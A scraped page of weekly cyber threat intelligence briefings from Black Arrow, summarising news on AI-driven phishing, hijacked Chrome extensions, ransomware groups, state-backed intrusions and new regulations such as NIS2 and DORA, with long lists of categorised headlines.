Another top WordPress plugin found carrying critical security flaws | TechRadar

First Android Update of 2025 Patches Critical Code Execution Vulnerabilities - SecurityWeek

WordPress Popular Posts Plugin Vulnerability Affects 100k+ Sites

Popular open source vulnerability scanner Nuclei forced to patch worrying security flaw | TechRadar

Dell, HPE, MediaTek Patch Vulnerabilities in Their Products - SecurityWeek

SonicWall urges admins to patch exploitable SSLVPN bug immediately

Palo Alto Networks Patches High-Severity Vulnerability in Retired Migration Tool - SecurityWeek

Apple rolls out mystery update with 'important bug fixes' for iPhones and iPads | ZDNET

UK Internet Domain Registry Nominet Suffers Cyber Attack - ISPreview UK

Gayfemboy Botnet targets Four-Faith router vulnerability

Chinese APT Exploits Versa Networks Zero-Day Flaw | Decipher

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Summary

Cyber security threats in 2024 became more sophisticated, with AI-driven phishing, ransomware, and state-sponsored attacks presenting significant challenges. This week’s threat intelligence review shows that hyper-personalised phishing campaigns now account for 90% of successful cyber attacks, costing organisations an average of $4.9m per breach. Ransomware-as-a-service (RaaS) has lowered barriers for attackers, targeting critical sectors and driving recovery costs to $3m per incident.

Geopolitical tensions have intensified risks, with NATO highlighting hybrid attacks from Russia and China’s state-backed groups targeting critical infrastructure. These incidents underscore the vulnerabilities in sectors like energy and emergency services, necessitating urgent action to enhance resilience.

Supply chain security also remains a concern, with Chrome extension compromises demonstrating the risks of inadequate oversight. New regulations such as the EU’s NIS2 directive and UK Financial Conduct Authority (FCA) rules will push businesses to improve third-party risk management and compliance in 2025.

To combat these threats, organisations must adopt a cyber security strategy that considers zero trust architectures, multi-factor authentication, and robust incident response plans. Effective training and the strategic leadership of Chief Information Security Officers (CISOs) are critical in bridging security and business objectives, ensuring resilience against an evolving cyber threat landscape. 

Top Cyber Stories of the Last Week

Corporate Executives are Being Increasingly Targeted by AI Phishing Scams

Corporate executives are increasingly targeted by sophisticated AI-driven phishing attacks, leveraging vast amounts of data to create hyper-personalised scams. Experts highlight a sharp rise in such attacks, with 90% of successful cyber attacks originating from phishing emails. These scams cost organisations significantly, with the global average cost of a data breach reaching $4.9m in 2024. Reports reveal a 28% increase in phishing attacks in Q2 2024, with some firms receiving up to 36 phishing emails daily. Businesses are urged to adopt multi-layered security measures and employee training to mitigate these escalating threats.

Unconventional Russian Attack Could Cause 'Substantial' Casualties, Top NATO Official Warns

NATO officials warn that hybrid attacks, particularly from Russia, are escalating to levels considered intolerable just five years ago, describing the situation as akin to "boiling the frog." These unconventional threats, including sabotage and cyber attacks, pose a "real prospect" of substantial casualties or significant economic harm. The rise in incidents is linked to Western support for Ukraine and Moscow's perception of NATO as an adversary. In response, NATO is updating its strategy on hybrid warfare, enhancing tracking of incidents and clarifying red lines to deter escalation, addressing ambiguities around thresholds for invoking Article 5.

35 Chrome Extensions Began Stealing People's Data After the Developers Got Phished

Recent reports have highlighted the risks associated with compromised Chrome extensions after a phishing campaign targeted developers. Attackers used fake Google warnings to trick developers into sharing login credentials, allowing them to introduce malicious updates to 35 extensions. These updates harvested data from users. Notably, even two-factor authentication was bypassed during the attacks, exposing vulnerabilities in the security process. Organisations are advised to review their use of Chrome extensions against published threat lists and ensure robust security awareness for staff managing digital assets to mitigate risks of similar incidents.

China's Cyber Intrusions Took a Sinister Turn in 2024

In 2024, Chinese state-backed cyber attacks took a concerning turn, moving from traditional espionage to pre-positioning for potential disruptive operations targeting critical infrastructure. Groups like Volt Typhoon have infiltrated US networks, including emergency services and the electric grid, using stealth techniques to avoid detection. Despite efforts to dismantle botnets, attackers maintain access to compromised systems, leveraging legitimate tools for reconnaissance and persistence. Experts warn that these activities highlight gaps in critical infrastructure security, with many organisations unaware of vulnerabilities. US agencies urge urgent action, including patching systems, upgrading outdated equipment, and adopting multi-factor authentication, to mitigate future threats.

Third Party Risk Management is Critical as DORA and New FCA Rules Come into Effect

New rules coming into effect in 2025 will require IT firms deemed “critical” to the UK financial sector to enhance transparency around cyber attacks and resilience measures. Overseen by the Financial Conduct Authority, the Bank of England and the Prudential Regulation Authority, the measures aim to ensure the sector remains resilient against threats like cyber attacks and natural disasters. While industry experts broadly welcome the focus on third-party risk management, questions remain about supplier classification and data-sharing processes. Firms will also need to conduct resilience testing, potentially collaborating with financial institutions to ensure robust protection of financial market infrastructures.

Ransomware 2024: A Year of Tricks, Traps, Wins and Losses

Ransomware attacks in 2024 reached unprecedented levels, targeting critical sectors like healthcare, public infrastructure, and the cloud. The rise of ransomware-as-a-service (RaaS) enabled less experienced attackers to launch devastating campaigns, while nation-state actors leveraged ransomware for geopolitical gains. High-profile incidents exposed vulnerabilities in healthcare, disrupted infrastructure, and fuelled economic warfare. Recovery costs soared to an average of $3 million per attack, reflecting attackers’ increasing sophistication. Generative AI played a dual role, enhancing both defences and threats. These developments underscore ransomware’s evolution into a strategic and economic weapon, demanding heightened resilience, zero-trust adoption, and global collaboration in 2025 and beyond.

The Modern CISO is a Cornerstone of Organisational Success

The role of the Chief Information Security Officer (CISO), whether internal or outsourced, has evolved from a technical focus to being integral to business strategy, bridging cyber security with operational and strategic objectives. Modern CISOs align security initiatives with business goals, enhance customer trust, and ensure compliance with complex regulatory frameworks. Key responsibilities include embedding security into operations without disrupting productivity, managing risks such as legacy systems and resource constraints, and implementing measures like zero trust architecture. As businesses face emerging threats, the CISO’s strategic leadership is increasingly vital to fostering resilience and securing competitive advantage.

Ransomware Reality Check: Are You Ready to Face Organised Cyber Crime?

Ransomware attacks remain a pressing concern, with professional criminal enterprises leveraging advanced extortion tactics that target data confidentiality rather than just availability. The shift from data encryption to exfiltration has increased ransom demands and heightened reputational risks for organisations. Many companies lack clear ransomware-specific policies, leaving leadership to make critical decisions under pressure during incidents. Preparation is vital; pre-defined payment stances, established incident response retainers, and proactive resilience measures are essential. Ransomware is not just a technical issue but a moral and business challenge, requiring C-suite collaboration to mitigate risks and avoid financing organised crime.

How Cops Taking Down Ransomware Gangs Led to the Meteoric Rise of Another

RansomHub has emerged as a dominant ransomware group in 2024, accounting for approximately 20% of all ransomware and data exfiltration incidents in Q4. The group capitalised on the law enforcement takedowns of their competitors LockBit and ALPHV, recruiting affiliates with a highly lucrative 90-10 revenue split. Their aggressive tactics and rapid rise have attracted significant attention, with over 210 victims targeted within six months, including major organisations across various sectors. While their methods are not unique, their speed and affiliate-centric model position them as a critical threat in early 2025, with law enforcement and security firms closely monitoring their activity.

Experts Unsure of Risk Appetite as EU Beefs Up Cyber Rules for Critical Infrastructure

The EU’s NIS2 directive places a renewed focus on cyber security for critical infrastructure and essential services, including energy, transport, and banking. Executives are directly accountable for compliance, with the directive requiring robust risk management, incident reporting, and scrutiny of suppliers’ security measures. Concerns remain over inconsistent enforcement across member states, which could complicate implementation. Experts predict that NIS2 will set a global benchmark for managing cyber risks, similar to the influence of GDPR on data privacy. Business leaders should prepare for increased scrutiny, especially as the directive's scope may encompass more organisations than initially expected.

Sources:

https://www.techradar.com/pro/security/corporate-executives-are-being-increasingly-targeted-by-ai-phishing-scams

https://news.sky.com/story/unconventional-russian-attack-could-cause-substantial-casualties-top-nato-official-warns-13281003

https://www.xda-developers.com/35-chrome-extensions-stealing-peoples-data/

https://www.theregister.com/2024/12/31/china_cyber_intrusions_2024/

https://www.complianceweek.com/regulatory-policy/tprm-critical-as-dora-new-fca-third-party-engagement-rules-come-into-effect-in-2025/35759.article

https://www.scworld.com/feature/ransomware-2024-a-year-of-tricks-traps-wins-and-losses

https://www.helpnetsecurity.com/2025/01/03/tomorrow-ciso-role-transformation/

https://insight.scmagazineuk.com/ransomware-reality-check-are-you-ready-to-face-organised-cybercrime

https://www.theregister.com/2024/12/28/lockbit_alphv_disruptions_ransomhub_rise/

https://www.complianceweek.com/regulatory-policy/experts-unsure-of-risk-appetite-as-eu-beefs-up-cyber-rules-for-critical-infrastructure/35760.article  

Governance, Risk and Compliance

TPRM critical as DORA, new FCA third-party engagement rules come into effect in 2025 | Premium | Compliance Week

Experts unsure of risk appetite as EU beefs up cyber rules for critical infrastructure | Premium | Compliance Week

The modern CISO is a cornerstone of organisational success - Help Net Security

Security leaders don't want to be held personally liable for attacks | TechRadar

How to Create an Enterprise-Wide Cyber Security Culture

What 2024’s Worst Cyber Attacks Show About Staying Safe in 2025

Cyber criminals tighten their grip on organisations - Help Net Security

Majority of UK SMEs Lack Cyber Security Policy - Infosecurity Magazine

CISO vs. CEO: Making a case for cyber security investments

The Most Dangerous People on the Internet in 2024 | WIRED

Cyber Security laws: Companies grapple with costs, complexity of overlapping cyber security laws - The Economic Times

2025 is when the internet could finally die and the consequences will be huge | The Independent

Crafting and Refining a Strategic 2025 Cyber Security Budget - Infosecurity Magazine

2025: A Critical Year for Cyber Security Compliance in the EU and UK - Infosecurity Magazine

The Ultimate 2025 New Year’s Resolutions For Tech Leaders

Top CISO Challenges 2024 - Infosecurity Magazine

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Reality Check: Are You Ready To Face Organised Cyber Crime? | SC Media UK

Record-breaking ransoms and breaches: A timeline of ransomware in 2024 | TechCrunch

How LockBit and ALPHV’s takedowns fuelled RansomHub’s rise • The Register

Clop ransomware lists Cleo cyber attack victims | TechRadar

Top 10 Most Active Ransomware Groups of 2024 - Infosecurity Magazine

What 2024’s Worst Cyber Attacks Show About Staying Safe in 2025

Ransomware 2024: A year of tricks, traps, wins and losses | SC Media

Ransomware downtime costs US healthcare organisations $1.9M daily | Healthcare IT News

US Army Soldier Arrested in AT&T, Verizon Extortions – Krebs on Security

Ransomware Victims

Clop ransomware lists Cleo cyber attack victims | TechRadar

Hackers Leak Rhode Island Citizens' Data on Dark Web - Infosecurity Magazine

Atos confirms not being compromised by the ransomware group

Thomas Cook Hit by Cyber Attack, IT Systems Impacted

Phishing & Email Based Attacks

Corporate executives are being increasingly targeted by AI phishing scams | TechRadar

Look out for hyper-personalized phishing attacks, powered by AI

New details reveal how hackers hijacked 35 Google Chrome extensions

These 35 Chrome extensions began stealing people's data after the developers got phished

Phishing Attack Allowed Malicious Chrome Extension to be Published | SC Media UK

Google Chrome extensions hack may have started much earlier than expected | TechRadar

Top 12 ways hackers broke into your systems in 2024 | CSO Online

Other Social Engineering

Cyberhaven Chrome Extension Hack Linked to Widening Supply Chain Campaign - SecurityWeek

OAuth Identity Attack — Are your Extensions Affected? - Security Boulevard

Cyber startup employee hacked to distribute malicious Chrome extension | The Record from Recorded Future News

Cyber security firm's Chrome extension hijacked to steal users' data

When Good Extensions Go Bad: Takeaways from the Campaign Targeting Browser Extensions

16 Chrome Extensions Hacked, Exposing Over 600,000 Users to Data Theft

Artificial Intelligence

Corporate executives are being increasingly targeted by AI phishing scams | TechRadar

Look out for hyper-personalized phishing attacks, powered by AI

AI agents may lead the next wave of cyber attacks - SiliconANGLE

LLMs could soon supercharge supply-chain attacks • The Register

'Bad Likert Judge' Jailbreaks OpenAI Defences

How will rules and regulations affect cyber security and AI in 2025? | SC Media

Deepfakes question our ability to discern reality - Help Net Security

Navigate the 2025 threat landscape with expert insights | TechTarget

2025: The Dawn of AI-Driven Cyber Crime

2FA/MFA

Google Chrome 2FA Bypass Attacks Confirmed—Millions Of Users At Risk

Malware

Experts warn of a surge in activity associated FICORA and Kaiten botnets

D-Link Botnet Attacks Surge in Global Spike - DataBreachToday

Over 600,000 Chrome users at risk after 16 browser extensions compromised by hackers — what you need to know | Tom's Guide

Malware botnets exploit outdated D-Link routers in recent attacks

Global Campaign Targets PlugX Malware with Innovative Portal - Infosecurity Magazine

Bots/Botnets

Experts warn of a surge in activity associated FICORA and Kaiten botnets

D-Link Botnet Attacks Surge in Global Spike - DataBreachToday

Malware botnets exploit outdated D-Link routers in recent attacks

Mobile

Wiping your Android phone? Here's the easiest way to erase all personal data | ZDNET

Critical Gmail Warning—Don’t Click Yes To These Google Security Alerts

Here's how to use the feature that protects your iPhone in case of a major cyber attack - PhoneArena

Denial of Service/DoS/DDoS

NTT Docomo hit by DDoS attack | Total Telecom

Internet of Things – IoT

Experts warn of a surge in activity associated FICORA and Kaiten botnets

D-Link Botnet Attacks Surge in Global Spike - DataBreachToday

Data Breaches/Leaks

Every minute, 4,080 records are compromised in data breaches - Help Net Security

Human error to blame in Ascension data breach that impacted 5.6 million patients | TechSpot

Massive VW Data Leak Exposed 800,000 EV Owners’ Movements, From Homes To Private Spaces | Carscoops

How Breach Readiness Will Shape Cyber Defence in 2025 - Security Boulevard

Machine gun, pistol and hundreds of devices lost by Ministry of Defence | UK News | Sky News

Cisco Confirms Authenticity of Data After Second Leak - SecurityWeek

Hackers Leak Rhode Island Citizens' Data on Dark Web - Infosecurity Magazine

ZAGG disclosed a data breach that exposed its customers' credit card data

Rhode Islanders’ Data Was Leaked From a Cyber Attack on State Health Benefits Website - SecurityWeek

Organised Crime & Criminal Actors

Cyber criminals tighten their grip on organisations - Help Net Security

Ransomware Reality Check: Are You Ready To Face Organised Cyber Crime? | SC Media UK

US Arrests Army Soldier Over AT&T, Verizon Hacking - SecurityWeek

2024: A jackpot year for North Korea's cyber criminals - Daily NK English

Insider Risk and Insider Threats

Human error to blame in Ascension data breach that impacted 5.6 million patients | TechSpot

Things not to store on your work laptop

Navigate the 2025 threat landscape with expert insights | TechTarget

US Army Soldier Arrested in AT&T, Verizon Extortions – Krebs on Security

Insurance

How to Get the Most Out of Cyber Insurance

Supply Chain and Third Parties

Cyberhaven Chrome Extension Hack Linked to Widening Supply Chain Campaign - SecurityWeek

OAuth Identity Attack — Are your Extensions Affected? - Security Boulevard

New details reveal how hackers hijacked 35 Google Chrome extensions

Google Chrome extensions hack may have started much earlier than expected | TechRadar

Over 600,000 Chrome users at risk after 16 browser extensions compromised by hackers — what you need to know | Tom's Guide

When Good Extensions Go Bad: Takeaways from the Campaign Targeting Browser Extensions

Chinese APT Exploits BeyondTrust API Key to Access U.S. Treasury Systems and Documents

China-linked hackers target US Treasury through compromised software provider in cyber attack | Invezz

TPRM critical as DORA, new FCA third-party engagement rules come into effect in 2025 | Premium | Compliance Week

LLMs could soon supercharge supply-chain attacks • The Register

Cloud/SaaS

Managing Cloud Risks Gave Security Teams a Big Headache in 2024

Misconfigured Kubernetes RBAC in Azure Airflow Could Expose Entire Cluster to Exploitation

Azure compromise possible with Apache Airflow vulnerabilities | SC Media

Stay Ahead: Integrating IAM with Your Cloud Strategy - Security Boulevard

Identity and Access Management

Machine identities are the next big target for attackers - Help Net Security

Misconfigured Kubernetes RBAC in Azure Airflow Could Expose Entire Cluster to Exploitation

Encryption

Quantum Computing Advances in 2024 Put Security In Spotlight

Will quantum computing break encryption as we know it?

Over 3 million mail servers without encryption exposed to sniffing attacks

The CISO’s guide to accelerating quantum-safe readiness

Hacker demonstrates the supposedly-patched Windows 11 BitLocker is still vulnerable to hackers — default encryption can be overcome with network access | Tom's Hardware

Passwords, Credential Stuffing & Brute Force Attacks

Passkeys were supposed to be secure and simple; here's how they fail

Regulations, Fines and Legislation

Experts unsure of risk appetite as EU beefs up cyber rules for critical infrastructure | Premium | Compliance Week

City regulators to start oversight of tech firms that provide ‘critical’ services to UK | Financial sector | The Guardian

New HIPAA Rules Mandate 72-Hour Data Restoration and Annual Compliance Audits

Top 10 Data Protection Fines and Settlements of 2024 - Infosecurity Magazine

How will rules and regulations affect cyber security and AI in 2025? | SC Media

Cyber security laws: Companies grapple with costs, complexity of overlapping cyber security laws - The Economic Times

2025: A Critical Year for Cyber Security Compliance in the EU and UK - Infosecurity Magazine

TPRM critical as DORA, new FCA third-party engagement rules come into effect in 2025 | Premium | Compliance Week

UN cyber crime treaty adopted amid pushback | SC Media

US proposes cyber security rules to limit impact of health data leaks

HIPAA to be updated with cyber security regulations, White House says | The Record from Recorded Future News

Navigating the SEC’s Cyber Security Disclosure Rules: One Year On - Security Boulevard

US prohibits data sales to adversarial nations | SC Media

Apple to Pay $95 Million to Settle Lawsuit Accusing Siri of Snoopy Eavesdropping - SecurityWeek

Court strikes down US net neutrality rules - BBC News

Models, Frameworks and Standards

TPRM critical as DORA, new FCA third-party engagement rules come into effect in 2025 | Premium | Compliance Week

City regulators to start oversight of tech firms that provide ‘critical’ services to UK | Financial sector | The Guardian

The 5 most impactful cyber security guidelines (and 3 that fell flat)

New HIPAA Rules Mandate 72-Hour Data Restoration and Annual Compliance Audits

Data Protection

Top 10 Data Protection Fines and Settlements of 2024 - Infosecurity Magazine

US prohibits data sales to adversarial nations | SC Media

Careers, Working in Cyber and Information Security

The state of cyber security and IT talent shortages - Help Net Security

Law Enforcement Action and Take Downs

Three Russian-German Nationals Charged with Espionage for Russian Secret Service

US Army Soldier Arrested in AT&T, Verizon Extortions – Krebs on Security

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

US prohibits data sales to adversarial nations | SC Media

Nation State Actors

China

China's cyber intrusions turns sinister in 2024 • The Register

What to know about string of US hacks blamed on China - BBC News

Chinese Hackers Reportedly Targeted US Sanctions Office

2024 Espionage Review: How China, Russia, North Korea, Iran, and Ethiopia Targeted U.S. Security - ClearanceJobs

Nato to boost Baltic Sea presence after suspected sabotage of underwater cable | Nato | The Guardian

Finland police seize ship after undersea power cable to Estonia is cut - The Washington Post

Ninth telecoms firm has been hit by a massive Chinese espionage campaign, the White House says - Washington Times

Finland finds drag marks on Baltic seabed after cable damage | Reuters

Palo Alto Firewalls Backdoored by Suspected Chinese Hackers

White House: Salt Typhoon hacks possible because telecoms lacked basic security measures | CyberScoop

US Treasury hacked: Are China and the US stepping up their cyberwar? | Cyber Crime News | Al Jazeera

AT&T and Verizon say networks secure after Salt Typhoon breach

The US plans a full tech embargo on China, Russia, and Iran, and NVIDIA may pay the price - Jason Deegan

China-linked hackers target US Treasury through compromised software provider in cyber attack | Invezz

Lumen reports that it has locked out the Salt Typhoon group from its network

Germany Says Latest Undersea Cable Cut a ‘Wake-up Call' - The Moscow Times

Estonia navy to protect undersea power link after main cable damaged - BBC News

Finland moves tanker suspected of undersea cable damage closer to port | Reuters

Russia

Russia could inflict 'substantial' casualties by unconventional attack against NATO, allied official says

Unconventional Russian attack could cause 'substantial' casualties, top NATO official warns | World News | Sky News

2024 Espionage Review: How China, Russia, North Korea, Iran, and Ethiopia Targeted U.S. Security - ClearanceJobs

Nato to boost Baltic Sea presence after suspected sabotage of underwater cable | Nato | The Guardian

Finland police seize ship after undersea power cable to Estonia is cut - The Washington Post

Finland finds drag marks on Baltic seabed after cable damage | Reuters

Ukraine recovers key notarial registers affected by Russian cyber attack | Ukrainska Pravda

Ukraine Cyber Support Funding Tops €200 million | SC Media UK

US sanctions Russian, Iranian groups for election interference | CyberScoop

Germany Says Latest Undersea Cable Cut a ‘Wake-up Call' - The Moscow Times

Three Russian-German Nationals Charged with Espionage for Russian Secret Service

Luxury Western Goods Line Russian Stores, Three Years Into Sanctions

Pro-Russian hackers target Italian airport websites – DW – 12/28/2024

Cyber attack on Italy's Foreign Ministry, airports claimed by pro-Russian hacker group | Reuters

The US plans a full tech embargo on China, Russia, and Iran, and NVIDIA may pay the price - Jason Deegan

Russian media outlets Telegram channels blocked in European countries

Estonia navy to protect undersea power link after main cable damaged - BBC News

Finland moves tanker suspected of undersea cable damage closer to port | Reuters

Russian smugglers import luxury cars from Europe despite sanctions

Iran

2024 Espionage Review: How China, Russia, North Korea, Iran, and Ethiopia Targeted U.S. Security - ClearanceJobs

US sanctions Russian, Iranian groups for election interference | CyberScoop

The US plans a full tech embargo on China, Russia, and Iran, and NVIDIA may pay the price - Jason Deegan

North Korea

2024 Espionage Review: How China, Russia, North Korea, Iran, and Ethiopia Targeted U.S. Security - ClearanceJobs

2024: A jackpot year for North Korea's cyber criminals - Daily NK English

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

2024 Espionage Review: How China, Russia, North Korea, Iran, and Ethiopia Targeted U.S. Security - ClearanceJobs

Tools and Controls

CISO vs. CEO: Making a case for cyber security investments

Managing Cloud Risks Gave Security Teams a Big Headache in 2024

Rotating Penetration Testing Providers: A Key to Robust Cyber Security | Luxembourg Times

Wiping your Android phone? Here's the easiest way to erase all personal data | ZDNET

Machine identities are the next big target for attackers - Help Net Security

How Breach Readiness Will Shape Cyber Defence in 2025 - Security Boulevard

2025 to be a Year of Reckoning for AI in Cyber Security - Infosecurity Magazine

Over 3 million mail servers without encryption exposed to sniffing attacks

Majority of UK SMEs Lack Cyber Security Policy - Infosecurity Magazine

Crafting and Refining a Strategic 2025 Cyber Security Budget - Infosecurity Magazine

CISOs don't invest enough in code security - Help Net Security

Stay Ahead: Integrating IAM with Your Cloud Strategy - Security Boulevard

Top security solutions being piloted today — and how to do it right | CSO Online

Shift left security — Good intentions, poor execution, and ways to fix it - SD Times

Regulations, security, and remote work: Why network outsourcing is booming - Help Net Security

55% of Companies Have Implemented AI-Powered Cyber Security

Other News

The Most Dangerous People on the Internet in 2024 | WIRED

2025 is when the internet could finally die and the consequences will be huge | The Independent

Cross-Domain Attacks: A Growing Threat to Modern Security and How to Combat Them

Hackers can steal your accounts, and all it takes is a double-click — don’t fall for this new form of clickjacking | Tom's Guide

Machine gun, pistol and hundreds of devices lost by Ministry of Defence | UK News | Sky News

Satisfied with Your Cyber Security? Think Again - Security Boulevard

What Security Lessons Did We Learn in 2024?

The Top Cyber Security Predictions for 2025: AI, Open Source, and Tackling the Signal Noise - ClearanceJobs

Cyber Security Lags in Middle East Business Development

New Year’s cyber security resolutions that every startup should keep | TechCrunch

Tackling Cyber Security Challenges With Global Collaboration

Cyber attack on Japan Airlines: A wake-up call for aviation security - Travel Radar - Aviation News

Space Diplomacy: A New Frontier for Cyber Security Efforts - Modern Diplomacy

Addressing growing concerns about cyber security in manufacturing

Hackers Are Hot for Water Utilities

Cyber attacks are on the rise. Is the public sector prepared? - WHYY

Vulnerability Management

Top 12 ways hackers broke into your systems in 2024 | CSO Online

Vulnerabilities

Active Directory Flaw Can Crash Any Microsoft Server

LDAPNightmare PoC Exploit Crashes LSASS and Reboots Windows Domain Controllers

Hackers exploit DoS flaw to disable Palo Alto Networks firewalls

Palo Alto Networks Patches Firewall Zero-Day Exploited for DoS Attacks - SecurityWeek

Severe Security Flaws Patched in Microsoft Dynamics 365 and Power Apps Web API

An X user claimed a 7-Zip zero-day vulnerability, but 7-Zip's creator says is a fake

Azure compromise possible with Apache Airflow vulnerabilities | SC Media

Hacker demonstrates the supposedly-patched Windows 11 BitLocker is still vulnerable to hackers — default encryption can be overcome with network access | Tom's Hardware

15,000+ Four-Faith Routers Exposed to New Exploit Due to Default Credentials

New Windows 11 24H2 bug could block future security updates - see who's affected | ZDNET

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Hackers are Using Russian Domains to Launch Complex Document-Based Phishing Attacks

New research reveals a sharp increase in malicious emails, bypassing secure gateways every 45 seconds. Remote Access Trojans rose by 59%, while open redirects soared by 627%. Phishing attacks are shifting to Microsoft Office documents, surging by nearly 600% in malicious use, and Russian domains, used four to twelve times more, are now being used for data exfiltration. Attackers harness widely used services like TikTok and Google AMP to redirect unsuspecting users to harmful links. This surge in threats highlights the urgent need for stronger cyber security measures to protect organisations’ networks and data.

How Nation-State Cyber Criminals are Targeting the Enterprise

Nation-state threat actors, once focused on critical infrastructure, are now targeting enterprises across industries as geopolitical tensions escalate. In the past year, these advanced groups have increased attacks on organisations handling sensitive data, aiming to exfiltrate intellectual property and disrupt operations. Unlike traditional ransomware gangs, they have significant resources, persistence, and clear missions such as espionage or undermining rivals. This complex threat environment underscores the need for robust cyber security measures, from strengthening incident response planning and network visibility, to fostering partnerships with government and industry peers. Effective defence requires ongoing vigilance and collaboration to safeguard critical assets.

Phishing Report Findings Call for a Fundamental Shift in Organisational Approaches to Defence

SlashNext’s 2024 Phishing Intelligence Report reveals a significant escalation in phishing threats, urging organisations to rethink their defence strategies. Credential phishing attacks surged by 703%, while email-based threats rose by 202%, exposing users to up to 600 mobile threats annually. 80% of embedded malicious links were zero-day threats (for which there was no remedy at the time) and bypassed traditional detection methods. Social engineering attacks increased by 141%, targeting users across platforms like Microsoft Teams and Dropbox. Experts emphasise the need for proactive, adaptive security strategies, advanced identity verification, and machine learning to counter evolving threats and safeguard critical assets in a rapidly expanding threat landscape.

Organisations Need to Get Real About Threat of Cyber Attacks

The UK’s National Cyber Security Centre’s eighth annual review warns that the threat from state-led and criminal cyber attacks is greater than many organisations realise. The impact is already huge, with attacks costing businesses $2 trillion last year. Experts say technology is only part of the solution, calling for stronger human defences, “digital trust” and realistic scenario planning. By running regular incident response exercises and improving user awareness, leaders can better prepare for and respond to breaches, maintaining trust and protecting their operations.

Black Arrow works with organisations of all sizes and sectors to design and prepare for managing a cyber security incident; this can include an Incident Response Plan and an educational tabletop exercise for the leadership team that highlights the proportionate controls to help the organisation prevent and mitigate an incident.

Dark Web Cyber Criminals are Buying Up IDs to Bypass KYC Methods

A new report by iProov reveals a sophisticated dark web operation collecting genuine identity documents and biometric data, often purchased directly from individuals, to bypass Know Your Customer (KYC) processes. The operation spans Latin America and Eastern Europe, posing a significant risk to organisations relying on traditional identity verification systems. iProov warns that these complete identity packages, combining real documents with matching biometrics, are exceptionally challenging to detect. To counteract these threats, firms must adopt a multi-layered, real-time verification approach to confirm both humanity and identity, significantly enhancing defences against advanced impersonation fraud.

Cl0p Ransomware Group to Name Over 60 Victims of Cleo Attack

The Cl0p ransomware group has exploited vulnerabilities in Cleo’s file transfer products, affecting over 60 organisations, with victims being contacted and provided proof of stolen data. Blue Yonder, a supply chain software provider, is the only named victim so far, though more are expected to be publicly identified unless ransoms are paid. The vulnerabilities, exploited since early December, allowed attackers to steal files without authentication, and Cleo’s tools are used by over 4,000 customers. Cl0p’s actions mirror its previous MOVEit campaign, further highlighting the persistent risks of unpatched file transfer systems.

Service Disruptions Continue to Blindside Businesses

PagerDuty's latest report highlights service disruptions as a pressing concern for businesses, with 88% of executives predicting another major incident within a year. The July global IT outage exposed gaps in preparedness, with 83% of executives caught off guard, resulting in lost revenue (37%) and delayed responses (39%). Nearly half of UK, US, and Australian leaders, along with a majority in Japan, cite insufficient real-time data tools as a hindrance. As 86% admit to prioritising efforts to build security rather than being ready to react if the security is breached, the report emphasises the need for proactive planning to mitigate the financial and reputational impacts of future disruptions.

Infostealers Dominate as Lumma Stealer Detections Soar by Almost 400%

An infostealer is a type of malicious software designed to secretly gather private information, such as passwords, financial details, or other sensitive data, from an infected device. Once it collects this data, it sends it to the attacker, who can then misuse it for financial gain, identity theft, or other illegal activities. Cyber security software provider ESET has found a 369% increase in detections of the Lumma Stealer infostealer, now dominating attacks by targeting 2FA browser extensions, user credentials and cryptocurrency wallets. Organisations should consider the threat of infostealers and other malicious software as part of a cohesive cyber security strategy.

Ransomware Attackers Target Industries with Low Downtime Tolerance

Cyber security provider Dragos found that 23 ransomware groups, including newly emerged or rebranded operators, impacted industrial organisations in Q3 2024. They targeted sectors with low downtime tolerance, such as healthcare and finance, resulting in significant operational halts, financial losses, and data compromises. One major automotive software firm paid a $25m ransom, while an oilfield services provider lost $35m. Attackers have evolved to bypass multi-factor authentication and exploit VPN weaknesses, with living-off-the-land and remote access tools enabling stealthy intrusions. They also increasingly rely on initial access brokers, using advanced malware to persist in virtual environments and critical operations.

North Koreans Stole $1.34bn In Crypto This Year

